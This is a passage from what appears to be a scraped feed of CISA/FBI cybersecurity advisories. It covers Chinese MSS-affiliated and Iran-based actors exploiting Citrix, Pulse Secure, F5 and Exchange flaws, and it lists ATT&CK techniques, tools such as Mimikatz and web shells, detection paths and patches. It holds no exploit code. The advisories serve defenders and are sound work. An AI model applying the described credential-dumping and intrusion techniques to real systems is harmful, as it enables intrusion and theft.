and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a >)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a >)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a >)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a >)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). \n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. \n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&amp;CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com >)][[11](<https://exploit-db.com >)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/ >)] \n \nThe following sections list the ATT&amp;CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. \n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto: CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto: Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:20", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&amp;CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1245/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. \n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. \n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n 